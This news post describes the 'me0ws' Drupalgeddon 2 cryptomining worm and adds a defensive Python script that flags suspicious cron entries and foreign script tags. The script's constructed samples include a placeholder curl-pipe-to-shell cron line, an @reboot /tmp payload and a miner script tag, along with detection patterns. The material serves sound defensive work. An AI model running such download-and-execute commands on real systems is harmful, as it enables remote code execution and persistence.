Drupal exploit "me0ws" spreads Monero malware to site visitors

Submitted by dryer on Fri, 05/04/2018 - 19:04
Cat vs. Drupal

A month after the critical vulnerability dubbed Drupalgeddon 2 was disclosed, it is now being actively exploited. Attackers are using botnets to exploit Drupal at scale, and most of them no longer deface the site or make their presence known at all.

Instead, cracked Drupal installations are being infected with worm-like malware that takes control of the server, or the cluster of servers, running Drupal. This lets the attackers use the popular CMS as an attack tool and profit from it indirectly.

A now more common technique is mining cryptocurrencies on dozens of insecure, penetrated installations: servers connected to the Internet 24/7 with reliable power and networking, and possibly thousands of visitors a day.

This is exactly what a new exploit does. The "me0ws" malware sneaks into a Drupal installation vulnerable to Drupalgeddon 2 (SA-CORE-2018-002/CVE-2018-7600) and starts spreading to its visitors.

The malware builds on Kitty, a sophisticated Monero cryptocurrency miner. Once the worm has penetrated the machine, it sets up a cron job to make sure it keeps running.

In addition to using the server itself, "me0ws" starts pushing a JavaScript-based miner to every visitor of the site. This lets the attacker tap not only the CPU resources of the server but also the CPU/GPU resources of any unsuspecting visitor.
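The two behaviours described above, a cron entry that keeps the miner alive and a script tag injected into pages served to visitors, are also the two places a site administrator can look for them. The following triage helpers are an added example written for this post, not code from the article, from Incapsula, or from the malware itself. The crontab and HTML inputs are constructed samples; the hostnames in them are placeholders, not indicators from the me0ws campaign, and the patterns are generic heuristics that flag lines for manual review rather than a signature for this specific malware.

```python
"""Triage helpers for two post-compromise behaviours of a cryptomining worm:
a cron job that restarts the miner, and a third-party script injected into
pages served to visitors.  All sample data below is constructed."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Cron heuristics (assumption: generic download-and-run / hidden-payload
# patterns, not me0ws-specific indicators).  A match means "review this".
CRON_SUSPICIOUS = [
    re.compile(r"(curl|wget)[^|;]*\|\s*(ba)?sh"),   # fetch remote script, pipe to shell
    re.compile(r"base64\s+(-d|--decode)"),          # command hidden behind encoding
    re.compile(r"/tmp/\S+|/dev/shm/\S+"),           # binaries run from world-writable dirs
    re.compile(r"(python|perl)\s+-c\s"),            # inline interpreter one-liners
]


def suspicious_cron_entries(crontab_text):
    """Return the non-comment cron lines that match any heuristic."""
    hits = []
    for line in crontab_text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        if any(p.search(stripped) for p in CRON_SUSPICIOUS):
            hits.append(stripped)
    return hits


class _ScriptCollector(HTMLParser):
    """Collect the src attribute of every <script src=...> in a page."""

    def __init__(self):
        super().__init__()
        self.external = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            src = dict(attrs).get("src")
            if src:
                self.external.append(src)


def foreign_scripts(html, site_host, allowed_hosts=()):
    """Return script URLs served from hosts that are neither the site itself
    nor on the administrator's allowlist.  Relative URLs (no host) are the
    site's own files and are skipped; protocol-relative "//host/x.js" is not."""
    collector = _ScriptCollector()
    collector.feed(html)
    flagged = []
    for src in collector.external:
        host = urlparse(src).netloc.lower()
        if host and host != site_host.lower() and host not in allowed_hosts:
            flagged.append(src)
    return flagged


# Constructed sample inputs (placeholder hosts, not real indicators).
SAMPLE_CRONTAB = """\
# m h dom mon dow command  (constructed sample crontab)
0 3 * * * /usr/bin/drush cron
*/5 * * * * curl -s http://example.invalid/k.sh | sh
@reboot /tmp/.x/run >/dev/null 2>&1
"""

SAMPLE_PAGE = """<html><head>
<script src="/core/misc/drupal.js"></script>
<script src="https://www.example.org/sites/default/files/js/site.js"></script>
<script src="https://cdn.example.net/lib.js"></script>
<script src="//miner.example.invalid/m.js"></script>
</head><body></body></html>"""


if __name__ == "__main__":
    for entry in suspicious_cron_entries(SAMPLE_CRONTAB):
        print("cron: review ->", entry)
    for url in foreign_scripts(SAMPLE_PAGE, "www.example.org", ("cdn.example.net",)):
        print("page: unexpected script ->", url)
```

Run against the output of `crontab -l` for the web server user (and the files under `/etc/cron.d`) and against a page fetched from the site as an anonymous visitor, since an injected miner is typically served to everyone. The allowlist is the administrator's own list of CDN hosts; anything else should be explained before it is trusted.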

This is an evil-genius attack that will likely simply run until the end of time, since neither the visitors nor the administrators of a site will be aware that a Drupal exploit has compromised their systems.

More in-depth information on the Drupal exploit is available on the Incapsula blog: Crypto Me0wing Attacks: Kitty Cashes in on Monero